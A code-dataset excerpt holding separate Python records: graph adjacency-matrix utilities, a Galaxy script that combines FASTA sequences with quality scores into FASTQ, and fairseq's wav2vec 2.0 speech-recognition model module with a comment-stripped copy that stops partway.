def rand_permute_adj_matrix(matrix):
num_vertices = matrix.shape[0]
rand_order = np.arange(num_vertices)
np.random.shuffle(rand_order)
matrix_permuted = rearrange_adj_matrix(matrix, rand_order)
return matrix_permuted
def ged_from_adj(adj_mat_1, adj_mat_2, directed=False, ged_function=graph_edit_dist.compare):
if directed:
create_using = nx.DiGraph
else:
create_using = nx.Graph
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=create_using())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=create_using())
return ged_function(g1, g2)
def ged_from_adj_nx(adj_mat_1, adj_mat_2, directed=False):
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=nx.graph_edit_distance)
def ged_from_adj_ged4py(adj_mat_1, adj_mat_2, directed=False):
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=graph_edit_dist.compare)
def is_isomorphic_from_adj(adj_mat_1, adj_mat_2):
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=nx.DiGraph())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=nx.DiGraph())
return nx.is_isomorphic(g1, g2)
def adj_matrix_to_edge_list(adj_matrix, directed=True, first_id=0, weighted=False):
num_nodes = adj_matrix.shape[0]
if directed:
num_edges = np.sum(adj_matrix)
else:
num_edges = int(np.sum(adj_matrix) / 2)
if weighted:
edge_list = np.zeros([num_edges, 3], dtype=np.int32)
else:
edge_list = np.zeros([num_edges, 2], dtype=np.int32)
i = 0
for node_in in range(num_nodes):
if directed:
range_2 = range(num_nodes)
else:
range_2 = range(node_in + 1, num_nodes)
for node_out in range_2:
edge_val = adj_matrix[node_in, node_out]
if edge_val > 0:
if weighted:
edge_list[i] = (node_in + first_id, node_out + first_id, edge_val)
else:
edge_list[i] = (node_in + first_id, node_out + first_id)
i += 1
return edge_list
def edge_list_to_textfile(edge_list, filepath, weighted=False):
with open(filepath, 'w') as file:
if weighted:
for i, j, weight in edge_list:
file.write(f"{i} {j} {weight}\n")
else:
for i, j in edge_list:
file.write(f"{i} {j}\n")
return
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790b096adf0a7dadc6f725ff23f532c4b282732e | size: 1,938 | ext: py | lang: Python
repo_path: tools/fastq/fastq_combiner.py | repo_name: bopopescu/phyG | head_hexsha: 023f505b705ab953f502cbc55e90612047867583 | licenses: ["CC-BY-3.0"]
stars: 2 (2016-02-23T00:09:14.000Z to 2019-02-11T07:48:44.000Z) | issues: null | forks: 6 (2015-05-27T13:09:50.000Z to 2019-02-11T07:48:46.000Z)
content:
#Dan Blankenberg
import sys, os, shutil
from galaxy_utils.sequence.fastq import fastqWriter, fastqSequencingRead, fastqCombiner, fastqFakeFastaScoreReader
from galaxy_utils.sequence.fasta import fastaReader, fastaNamedReader
def main():
#Read command line arguments
fasta_filename = sys.argv[1]
fasta_type = sys.argv[2] or 'fasta' #should always be fasta or csfasta? what if txt?
qual_filename = sys.argv[3]
qual_type = sys.argv[4] or 'qualsanger' #qual454 qualsolid
output_filename = sys.argv[5]
force_quality_encoding = sys.argv[6]
if force_quality_encoding == 'None':
force_quality_encoding = None
format = 'sanger'
if fasta_type == 'csfasta' or qual_type == 'qualsolid':
format = 'cssanger'
elif qual_type == 'qualsolexa':
format = 'solexa'
elif qual_type == 'qualillumina':
format = 'illumina'
out = fastqWriter( open( output_filename, 'wb' ), format = format, force_quality_encoding = force_quality_encoding )
if qual_filename == 'None':
qual_input = fastqFakeFastaScoreReader( format, quality_encoding = force_quality_encoding )
else:
qual_input = fastaNamedReader( open( qual_filename, 'rb' ) )
fastq_combiner = fastqCombiner( format )
i = None
skip_count = 0
for i, sequence in enumerate( fastaReader( open( fasta_filename, 'rb' ) ) ):
quality = qual_input.get( sequence )
if quality:
fastq_read = fastq_combiner.combine( sequence, quality )
out.write( fastq_read )
else:
skip_count += 1
out.close()
if i is None:
print "Your file contains no valid FASTA sequences."
else:
print qual_input.has_data()
print 'Combined %s of %s sequences with quality scores (%.2f%%).' % ( i - skip_count + 1, i + 1, float( i - skip_count + 1 ) / float( i + 1 ) * 100.0 )
if __name__ == "__main__":
main()
avg_line_length: 38.76 | max_line_length: 159 | alphanum_fraction: 0.657895
content_no_comment (the same script with comments stripped):
import sys, os, shutil
from galaxy_utils.sequence.fastq import fastqWriter, fastqSequencingRead, fastqCombiner, fastqFakeFastaScoreReader
from galaxy_utils.sequence.fasta import fastaReader, fastaNamedReader
def main():
fasta_filename = sys.argv[1]
fasta_type = sys.argv[2] or 'fasta'
qual_filename = sys.argv[3]
qual_type = sys.argv[4] or 'qualsanger'
output_filename = sys.argv[5]
force_quality_encoding = sys.argv[6]
if force_quality_encoding == 'None':
force_quality_encoding = None
format = 'sanger'
if fasta_type == 'csfasta' or qual_type == 'qualsolid':
format = 'cssanger'
elif qual_type == 'qualsolexa':
format = 'solexa'
elif qual_type == 'qualillumina':
format = 'illumina'
out = fastqWriter( open( output_filename, 'wb' ), format = format, force_quality_encoding = force_quality_encoding )
if qual_filename == 'None':
qual_input = fastqFakeFastaScoreReader( format, quality_encoding = force_quality_encoding )
else:
qual_input = fastaNamedReader( open( qual_filename, 'rb' ) )
fastq_combiner = fastqCombiner( format )
i = None
skip_count = 0
for i, sequence in enumerate( fastaReader( open( fasta_filename, 'rb' ) ) ):
quality = qual_input.get( sequence )
if quality:
fastq_read = fastq_combiner.combine( sequence, quality )
out.write( fastq_read )
else:
skip_count += 1
out.close()
if i is None:
print "Your file contains no valid FASTA sequences."
else:
print qual_input.has_data()
print 'Combined %s of %s sequences with quality scores (%.2f%%).' % ( i - skip_count + 1, i + 1, float( i - skip_count + 1 ) / float( i + 1 ) * 100.0 )
if __name__ == "__main__":
main()
is_comment_constant_removed: false | is_sharp_comment_removed: true
hexsha: 790b0a8ad1c25e10ce9deea1ce87883a46e7a21f | size: 20,506 | ext: py | lang: Python
repo_path: fairseq/models/wav2vec/wav2vec2_asr.py | repo_name: fairseq-FT/fairseq | head_hexsha: 18725499144c1bba7c151b796ba774e59d36eaa9 | licenses: ["MIT"]
stars: 33 (2021-01-06T18:03:55.000Z to 2022-03-28T12:07:44.000Z) | issues: 8 (2021-06-11T03:11:37.000Z to 2022-03-08T19:15:42.000Z) | forks: 14 (2021-05-17T06:55:01.000Z to 2022-03-28T12:07:42.000Z)
content:
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from argparse import Namespace
import contextlib
import copy
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dataclasses import dataclass, field
from omegaconf import MISSING, II, open_dict
from typing import Any
from fairseq import checkpoint_utils, tasks, utils
from fairseq.dataclass import FairseqDataclass
from fairseq.dataclass.utils import convert_namespace_to_omegaconf
from fairseq.tasks import FairseqTask
from fairseq.models import (
BaseFairseqModel,
FairseqEncoder,
FairseqEncoderDecoderModel,
FairseqIncrementalDecoder,
register_model,
)
from fairseq.models.wav2vec.wav2vec2 import MASKING_DISTRIBUTION_CHOICES
from fairseq.modules import LayerNorm, PositionalEmbedding, TransformerDecoderLayer
@dataclass
class Wav2Vec2AsrConfig(FairseqDataclass):
w2v_path: str = field(
default=MISSING, metadata={"help": "path to wav2vec 2.0 model"}
)
no_pretrained_weights: bool = field(
default=False, metadata={"help": "if true, does not load pretrained weights"}
)
dropout_input: float = field(
default=0.0,
metadata={"help": "dropout to apply to the input (after feat extr)"},
)
final_dropout: float = field(
default=0.0,
metadata={"help": "dropout after transformer and before final projection"},
)
dropout: float = field(
default=0.0, metadata={"help": "dropout probability inside wav2vec 2.0 model"}
)
attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside wav2vec 2.0 model"
},
)
activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside wav2vec 2.0 model"
},
)
# masking
apply_mask: bool = field(
default=False, metadata={"help": "apply masking during fine-tuning"}
)
mask_length: int = field(
default=10, metadata={"help": "repeat the mask indices multiple times"}
)
mask_prob: float = field(
default=0.5,
metadata={
"help": "probability of replacing a token with mask (normalized by length)"
},
)
mask_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static", metadata={"help": "how to choose masks"}
)
mask_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indices"
},
)
no_mask_overlap: bool = field(
default=False, metadata={"help": "whether to allow masks to overlap"}
)
# channel masking
mask_channel_length: int = field(
default=10, metadata={"help": "length of the mask for features (channels)"}
)
mask_channel_prob: float = field(
default=0.0, metadata={"help": "probability of replacing a feature with 0"}
)
mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static",
metadata={"help": "how to choose mask length for channel masking"},
)
mask_channel_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indicesh"
},
)
no_mask_channel_overlap: bool = field(
default=False, metadata={"help": "whether to allow channel masks to overlap"}
)
freeze_finetune_updates: int = field(
default=0, metadata={"help": "dont finetune wav2vec for this many updates"}
)
feature_grad_mult: float = field(
default=0.0, metadata={"help": "reset feature grad mult in wav2vec 2.0 to this"}
)
layerdrop: float = field(
default=0.0, metadata={"help": "probability of dropping a layer in wav2vec 2.0"}
)
normalize: bool = II("task.normalize")
data: str = II("task.data")
# this holds the loaded wav2vec args
w2v_args: Any = None
@dataclass
class Wav2Vec2CtcConfig(Wav2Vec2AsrConfig):
pass
@register_model("wav2vec_ctc", dataclass=Wav2Vec2CtcConfig)
class Wav2VecCtc(BaseFairseqModel):
def __init__(self, cfg: Wav2Vec2CtcConfig, w2v_encoder: BaseFairseqModel):
super().__init__()
self.cfg = cfg
self.w2v_encoder = w2v_encoder
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
@classmethod
def build_model(cls, cfg: Wav2Vec2CtcConfig, task: FairseqTask):
"""Build a new model instance."""
w2v_encoder = Wav2VecEncoder(cfg, task.target_dictionary)
return cls(cfg, w2v_encoder)
def get_normalized_probs(self, net_output, log_probs):
"""Get normalized probabilities (or log probs) from a net's output."""
logits = net_output["encoder_out"]
if log_probs:
return utils.log_softmax(logits.float(), dim=-1)
else:
return utils.softmax(logits.float(), dim=-1)
def forward(self, **kwargs):
x = self.w2v_encoder(**kwargs)
return x
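# --- Illustrative sketch (added for clarity; not part of the original fairseq file) ---
# Sketches how Wav2VecCtc.get_normalized_probs() is typically consumed. The dict layout and
# the (time x batch x vocab) logits shape below are assumptions made for illustration only;
# this helper is hypothetical and never called elsewhere in this file.
def _demo_ctc_probs(ctc_model: Wav2VecCtc):
    fake_net_output = {"encoder_out": torch.randn(50, 2, 32)}  # made-up logits, T x B x vocab
    log_probs = ctc_model.get_normalized_probs(fake_net_output, log_probs=True)
    return log_probs.exp().sum(dim=-1)  # each frame's probabilities should sum to ~1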
@dataclass
class Wav2Vec2Seq2SeqConfig(Wav2Vec2AsrConfig):
decoder_embed_dim: int = field(
default=768, metadata={"help": "decoder embedding dimension"}
)
decoder_ffn_embed_dim: int = field(
default=3072, metadata={"help": "decoder embedding dimension for FFN"}
)
decoder_layers: int = field(default=6, metadata={"help": "num of decoder layers"})
decoder_layerdrop: float = field(
default=0.0, metadata={"help": "decoder layerdrop chance"}
)
decoder_attention_heads: int = field(
default=4, metadata={"help": "num decoder attention heads"}
)
decoder_learned_pos: bool = field(
default=False,
metadata={"help": "use learned positional embeddings in the decoder"},
)
decoder_normalize_before: bool = field(
default=False, metadata={"help": "apply layernorm before each decoder block"}
)
no_token_positional_embeddings: bool = field(
default=False,
metadata={
"help": "if set, disables positional embeddings (outside self attention)"
},
)
decoder_dropout: float = field(
default=0.0, metadata={"help": "dropout probability in the decoder"}
)
decoder_attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside the decoder"
},
)
decoder_activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside the decoder"
},
)
max_target_positions: int = field(
default=2048, metadata={"help": "max target positions"}
)
share_decoder_input_output_embed: bool = field(
default=False, metadata={"help": "share decoder input and output embeddings"}
)
@register_model("wav2vec_seq2seq", dataclass=Wav2Vec2Seq2SeqConfig)
class Wav2Vec2Seq2SeqModel(FairseqEncoderDecoderModel):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
@classmethod
def build_model(cls, cfg: Wav2Vec2Seq2SeqConfig, task: FairseqTask):
"""Build a new model instance."""
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
return emb
decoder_embed_tokens = build_embedding(tgt_dict, cfg.decoder_embed_dim)
encoder = cls.build_encoder(cfg)
decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens)
return Wav2Vec2Seq2SeqModel(encoder, decoder)
@classmethod
def build_encoder(cls, cfg: Wav2Vec2AsrConfig):
return Wav2VecEncoder(cfg)
@classmethod
def build_decoder(cls, cfg: Wav2Vec2Seq2SeqConfig, tgt_dict, embed_tokens):
return TransformerDecoder(cfg, tgt_dict, embed_tokens)
def forward(self, **kwargs):
encoder_out = self.encoder(tbc=False, **kwargs)
decoder_out = self.decoder(encoder_out=encoder_out, **kwargs)
return decoder_out
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
class Wav2VecEncoder(FairseqEncoder):
def __init__(self, cfg: Wav2Vec2AsrConfig, tgt_dict=None):
self.apply_mask = cfg.apply_mask
arg_overrides = {
"dropout": cfg.dropout,
"activation_dropout": cfg.activation_dropout,
"dropout_input": cfg.dropout_input,
"attention_dropout": cfg.attention_dropout,
"mask_length": cfg.mask_length,
"mask_prob": cfg.mask_prob,
"mask_selection": cfg.mask_selection,
"mask_other": cfg.mask_other,
"no_mask_overlap": cfg.no_mask_overlap,
"mask_channel_length": cfg.mask_channel_length,
"mask_channel_prob": cfg.mask_channel_prob,
"mask_channel_selection": cfg.mask_channel_selection,
"mask_channel_other": cfg.mask_channel_other,
"no_mask_channel_overlap": cfg.no_mask_channel_overlap,
"encoder_layerdrop": cfg.layerdrop,
"feature_grad_mult": cfg.feature_grad_mult,
}
if cfg.w2v_args is None:
state = checkpoint_utils.load_checkpoint_to_cpu(cfg.w2v_path, arg_overrides)
w2v_args = state.get("cfg", None)
if w2v_args is None:
w2v_args = convert_namespace_to_omegaconf(state["args"])
cfg.w2v_args = w2v_args
else:
state = None
w2v_args = cfg.w2v_args
if isinstance(w2v_args, Namespace):
cfg.w2v_args = w2v_args = convert_namespace_to_omegaconf(w2v_args)
assert cfg.normalize == w2v_args.task.normalize, (
"Fine-tuning works best when data normalization is the same. "
"Please check that --normalize is set or unset for both pre-training and here"
)
w2v_args.task.data = cfg.data
task = tasks.setup_task(w2v_args.task)
model = task.build_model(w2v_args.model)
if state is not None and not cfg.no_pretrained_weights:
model.load_state_dict(state["model"], strict=True)
model.remove_pretraining_modules()
super().__init__(task.source_dictionary)
d = w2v_args.model.encoder_embed_dim
self.w2v_model = model
self.final_dropout = nn.Dropout(cfg.final_dropout)
self.freeze_finetune_updates = cfg.freeze_finetune_updates
self.num_updates = 0
if tgt_dict is not None:
self.proj = Linear(d, len(tgt_dict))
elif getattr(cfg, "decoder_embed_dim", d) != d:
self.proj = Linear(d, cfg.decoder_embed_dim)
else:
self.proj = None
def set_num_updates(self, num_updates):
"""Set the number of parameters updates."""
super().set_num_updates(num_updates)
self.num_updates = num_updates
def forward(self, source, padding_mask, tbc=True, **kwargs):
w2v_args = {
"source": source,
"padding_mask": padding_mask,
"mask": self.apply_mask and self.training,
}
ft = self.freeze_finetune_updates <= self.num_updates
with torch.no_grad() if not ft else contextlib.ExitStack():
x, padding_mask = self.w2v_model.extract_features(**w2v_args)
if tbc:
# B x T x C -> T x B x C
x = x.transpose(0, 1)
x = self.final_dropout(x)
if self.proj:
x = self.proj(x)
return {
"encoder_out": x, # T x B x C
"encoder_padding_mask": padding_mask, # B x T
"padding_mask": padding_mask,
}
def reorder_encoder_out(self, encoder_out, new_order):
if encoder_out["encoder_out"] is not None:
encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select(
1, new_order
)
if encoder_out["encoder_padding_mask"] is not None:
encoder_out["encoder_padding_mask"] = encoder_out[
"encoder_padding_mask"
].index_select(0, new_order)
return encoder_out
def max_positions(self):
"""Maximum input length supported by the encoder."""
return None
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
class TransformerDecoder(FairseqIncrementalDecoder):
"""
Transformer decoder consisting of *args.decoder_layers* layers. Each layer
is a :class:`TransformerDecoderLayer`.
Args:
args (argparse.Namespace): parsed command-line arguments
dictionary (~fairseq.data.Dictionary): decoding dictionary
embed_tokens (torch.nn.Embedding): output embedding
no_encoder_attn (bool, optional): whether to attend to encoder outputs
(default: False).
"""
def __init__(
self,
cfg: Wav2Vec2Seq2SeqConfig,
dictionary,
embed_tokens,
no_encoder_attn=False,
):
super().__init__(dictionary)
self.dropout = cfg.decoder_dropout
self.share_input_output_embed = cfg.share_decoder_input_output_embed
input_embed_dim = embed_tokens.embedding_dim
embed_dim = cfg.decoder_embed_dim
self.output_embed_dim = cfg.decoder_embed_dim
self.layerdrop = cfg.decoder_layerdrop
padding_idx = embed_tokens.padding_idx
self.max_target_positions = cfg.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim) # todo: try with input_embed_dim
self.project_in_dim = (
Linear(input_embed_dim, embed_dim, bias=False)
if embed_dim != input_embed_dim
else None
)
self.embed_positions = (
PositionalEmbedding(
cfg.max_target_positions,
embed_dim,
padding_idx,
learned=cfg.decoder_learned_pos,
)
if not cfg.no_token_positional_embeddings
else None
)
# TODO: update this when transformer gets converted to dataclass configs
transformer_cfg = copy.deepcopy(cfg)
with open_dict(transformer_cfg):
transformer_cfg.dropout = transformer_cfg.decoder_dropout
transformer_cfg.attention_dropout = (
transformer_cfg.decoder_attention_dropout
)
transformer_cfg.activation_dropout = (
transformer_cfg.decoder_activation_dropout
)
self.layers = nn.ModuleList([])
self.layers.extend(
[
TransformerDecoderLayer(transformer_cfg, no_encoder_attn)
for _ in range(transformer_cfg.decoder_layers)
]
)
if not self.share_input_output_embed:
self.embed_out = nn.Parameter(
torch.Tensor(len(dictionary), self.output_embed_dim)
)
nn.init.normal_(self.embed_out, mean=0, std=self.output_embed_dim ** -0.5)
if transformer_cfg.decoder_normalize_before:
self.layer_norm = LayerNorm(embed_dim)
else:
self.layer_norm = None
def forward(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
"""
Args:
prev_output_tokens (LongTensor): previous decoder outputs of shape
`(batch, tgt_len)`, for teacher forcing
encoder_out (Tensor, optional): output from the encoder, used for
encoder-side attention
incremental_state (dict): dictionary used for storing state during
:ref:`Incremental decoding`
Returns:
tuple:
- the decoder's output of shape `(batch, tgt_len, vocab)`
- a dictionary with any model-specific outputs
"""
prev_output_tokens = prev_output_tokens.long()
x, extra = self.extract_features(
prev_output_tokens, encoder_out, incremental_state
)
x = self.output_layer(x)
return x, extra
def extract_features(
self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused
):
"""
Similar to *forward* but only return features.
Returns:
tuple:
- the decoder's features of shape `(batch, tgt_len, embed_dim)`
- a dictionary with any model-specific outputs
"""
# embed positions
positions = (
self.embed_positions(
prev_output_tokens, incremental_state=incremental_state
)
if self.embed_positions is not None
else None
)
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# embed tokens and positions
x = self.embed_scale * self.embed_tokens(prev_output_tokens)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions
x = F.dropout(x, p=self.dropout, training=self.training)
# B x T x C -> T x B x C
x = x.transpose(0, 1)
attn = None
inner_states = [x]
# decoder layers
for layer in self.layers:
dropout_probability = np.random.random()
if not self.training or (dropout_probability > self.layerdrop):
x, attn, _ = layer(
x,
encoder_out["encoder_out"] if encoder_out is not None else None,
encoder_out["encoder_padding_mask"]
if encoder_out is not None
else None,
incremental_state,
self_attn_mask=self.buffered_future_mask(x)
if incremental_state is None
else None,
)
inner_states.append(x)
if self.layer_norm:
x = self.layer_norm(x)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
return x, {"attn": attn, "inner_states": inner_states}
def output_layer(self, features, **kwargs):
"""Project features to the vocabulary size."""
# project back to size of vocabulary
if self.share_input_output_embed:
return F.linear(features, self.embed_tokens.weight)
else:
return F.linear(features, self.embed_out)
def max_positions(self):
"""Maximum output length supported by the decoder."""
if self.embed_positions is None:
return self.max_target_positions
return min(self.max_target_positions, self.embed_positions.max_positions)
def buffered_future_mask(self, tensor):
dim = tensor.size(0)
if (
not hasattr(self, "_future_mask")
or self._future_mask is None
or self._future_mask.device != tensor.device
or self._future_mask.size(0) < dim
):
self._future_mask = torch.triu(
utils.fill_with_neg_inf(tensor.new(dim, dim)), 1
)
return self._future_mask[:dim, :dim]
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, bias=True):
m = nn.Linear(in_features, out_features, bias)
nn.init.xavier_uniform_(m.weight)
if bias:
nn.init.constant_(m.bias, 0.0)
return m
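# --- Illustrative sketch (added for clarity; not part of the original fairseq file) ---
# Shows what the two factory helpers above return: an nn.Embedding whose padding row is
# zeroed out and a Xavier-initialised nn.Linear with zero bias. The sizes are arbitrary
# example values and the function is never called.
def _demo_factories():
    emb = Embedding(num_embeddings=10, embedding_dim=8, padding_idx=1)
    proj = Linear(in_features=8, out_features=4)
    assert emb.weight[1].abs().sum().item() == 0.0  # padding embedding is all zeros
    return emb, proj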
avg_line_length: 34.521886 | max_line_length: 90 | alphanum_fraction: 0.631913
content_no_comment (the same module with comments and docstrings stripped):
from argparse import Namespace
import contextlib
import copy
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dataclasses import dataclass, field
from omegaconf import MISSING, II, open_dict
from typing import Any
from fairseq import checkpoint_utils, tasks, utils
from fairseq.dataclass import FairseqDataclass
from fairseq.dataclass.utils import convert_namespace_to_omegaconf
from fairseq.tasks import FairseqTask
from fairseq.models import (
BaseFairseqModel,
FairseqEncoder,
FairseqEncoderDecoderModel,
FairseqIncrementalDecoder,
register_model,
)
from fairseq.models.wav2vec.wav2vec2 import MASKING_DISTRIBUTION_CHOICES
from fairseq.modules import LayerNorm, PositionalEmbedding, TransformerDecoderLayer
@dataclass
class Wav2Vec2AsrConfig(FairseqDataclass):
w2v_path: str = field(
default=MISSING, metadata={"help": "path to wav2vec 2.0 model"}
)
no_pretrained_weights: bool = field(
default=False, metadata={"help": "if true, does not load pretrained weights"}
)
dropout_input: float = field(
default=0.0,
metadata={"help": "dropout to apply to the input (after feat extr)"},
)
final_dropout: float = field(
default=0.0,
metadata={"help": "dropout after transformer and before final projection"},
)
dropout: float = field(
default=0.0, metadata={"help": "dropout probability inside wav2vec 2.0 model"}
)
attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside wav2vec 2.0 model"
},
)
activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside wav2vec 2.0 model"
},
)
apply_mask: bool = field(
default=False, metadata={"help": "apply masking during fine-tuning"}
)
mask_length: int = field(
default=10, metadata={"help": "repeat the mask indices multiple times"}
)
mask_prob: float = field(
default=0.5,
metadata={
"help": "probability of replacing a token with mask (normalized by length)"
},
)
mask_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static", metadata={"help": "how to choose masks"}
)
mask_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indices"
},
)
no_mask_overlap: bool = field(
default=False, metadata={"help": "whether to allow masks to overlap"}
)
mask_channel_length: int = field(
default=10, metadata={"help": "length of the mask for features (channels)"}
)
mask_channel_prob: float = field(
default=0.0, metadata={"help": "probability of replacing a feature with 0"}
)
mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static",
metadata={"help": "how to choose mask length for channel masking"},
)
mask_channel_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indicesh"
},
)
no_mask_channel_overlap: bool = field(
default=False, metadata={"help": "whether to allow channel masks to overlap"}
)
freeze_finetune_updates: int = field(
default=0, metadata={"help": "dont finetune wav2vec for this many updates"}
)
feature_grad_mult: float = field(
default=0.0, metadata={"help": "reset feature grad mult in wav2vec 2.0 to this"}
)
layerdrop: float = field(
default=0.0, metadata={"help": "probability of dropping a layer in wav2vec 2.0"}
)
normalize: bool = II("task.normalize")
data: str = II("task.data")
w2v_args: Any = None
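# A hedged, simplified sketch (not fairseq's compute_mask_indices) of how the
# mask_prob and mask_length fields above interact under the "static"
# mask_selection policy: roughly mask_prob * T / mask_length spans are drawn,
# each mask_length timesteps long. All names below are illustrative only.
import numpy as np

def simple_span_mask(seq_len: int, mask_prob: float, mask_length: int, rng=None):
    """Return a boolean mask of shape (seq_len,) made of fixed-length spans."""
    if rng is None:
        rng = np.random.default_rng()
    mask = np.zeros(seq_len, dtype=bool)
    if seq_len < mask_length:
        return mask
    # probabilistic rounding of the expected number of spans
    num_spans = int(mask_prob * seq_len / float(mask_length) + rng.random())
    if num_spans == 0:
        return mask
    starts = rng.choice(seq_len - mask_length + 1, size=num_spans, replace=False)
    for s in starts:
        mask[s:s + mask_length] = True
    return mask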
@dataclass
class Wav2Vec2CtcConfig(Wav2Vec2AsrConfig):
pass
@register_model("wav2vec_ctc", dataclass=Wav2Vec2CtcConfig)
class Wav2VecCtc(BaseFairseqModel):
def __init__(self, cfg: Wav2Vec2CtcConfig, w2v_encoder: BaseFairseqModel):
super().__init__()
self.cfg = cfg
self.w2v_encoder = w2v_encoder
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
@classmethod
def build_model(cls, cfg: Wav2Vec2CtcConfig, task: FairseqTask):
w2v_encoder = Wav2VecEncoder(cfg, task.target_dictionary)
return cls(cfg, w2v_encoder)
def get_normalized_probs(self, net_output, log_probs):
logits = net_output["encoder_out"]
if log_probs:
return utils.log_softmax(logits.float(), dim=-1)
else:
return utils.softmax(logits.float(), dim=-1)
def forward(self, **kwargs):
x = self.w2v_encoder(**kwargs)
return x
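# A hedged usage sketch (not part of fairseq): consuming the log-probabilities
# returned by Wav2VecCtc.get_normalized_probs with a greedy (best-path) CTC
# decode. The (time, batch, vocab) layout and blank index 0 are assumptions.
import torch

def greedy_ctc_decode(log_probs: torch.Tensor, blank: int = 0):
    """Collapse repeated frame predictions and drop blank tokens."""
    preds = log_probs.argmax(dim=-1).transpose(0, 1)  # -> (batch, time)
    decoded = []
    for seq in preds:
        tokens, prev = [], None
        for t in seq.tolist():
            if t != blank and t != prev:
                tokens.append(t)
            prev = t
        decoded.append(tokens)
    return decoded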
@dataclass
class Wav2Vec2Seq2SeqConfig(Wav2Vec2AsrConfig):
decoder_embed_dim: int = field(
default=768, metadata={"help": "decoder embedding dimension"}
)
decoder_ffn_embed_dim: int = field(
default=3072, metadata={"help": "decoder embedding dimension for FFN"}
)
decoder_layers: int = field(default=6, metadata={"help": "num of decoder layers"})
decoder_layerdrop: float = field(
default=0.0, metadata={"help": "decoder layerdrop chance"}
)
decoder_attention_heads: int = field(
default=4, metadata={"help": "num decoder attention heads"}
)
decoder_learned_pos: bool = field(
default=False,
metadata={"help": "use learned positional embeddings in the decoder"},
)
decoder_normalize_before: bool = field(
default=False, metadata={"help": "apply layernorm before each decoder block"}
)
no_token_positional_embeddings: bool = field(
default=False,
metadata={
"help": "if set, disables positional embeddings (outside self attention)"
},
)
decoder_dropout: float = field(
default=0.0, metadata={"help": "dropout probability in the decoder"}
)
decoder_attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside the decoder"
},
)
decoder_activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside the decoder"
},
)
max_target_positions: int = field(
default=2048, metadata={"help": "max target positions"}
)
share_decoder_input_output_embed: bool = field(
default=False, metadata={"help": "share decoder input and output embeddings"}
)
@register_model("wav2vec_seq2seq", dataclass=Wav2Vec2Seq2SeqConfig)
class Wav2Vec2Seq2SeqModel(FairseqEncoderDecoderModel):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
@classmethod
def build_model(cls, cfg: Wav2Vec2Seq2SeqConfig, task: FairseqTask):
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
return emb
decoder_embed_tokens = build_embedding(tgt_dict, cfg.decoder_embed_dim)
encoder = cls.build_encoder(cfg)
decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens)
return Wav2Vec2Seq2SeqModel(encoder, decoder)
@classmethod
def build_encoder(cls, cfg: Wav2Vec2AsrConfig):
return Wav2VecEncoder(cfg)
@classmethod
def build_decoder(cls, cfg: Wav2Vec2Seq2SeqConfig, tgt_dict, embed_tokens):
return TransformerDecoder(cfg, tgt_dict, embed_tokens)
def forward(self, **kwargs):
encoder_out = self.encoder(tbc=False, **kwargs)
decoder_out = self.decoder(encoder_out=encoder_out, **kwargs)
return decoder_out
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
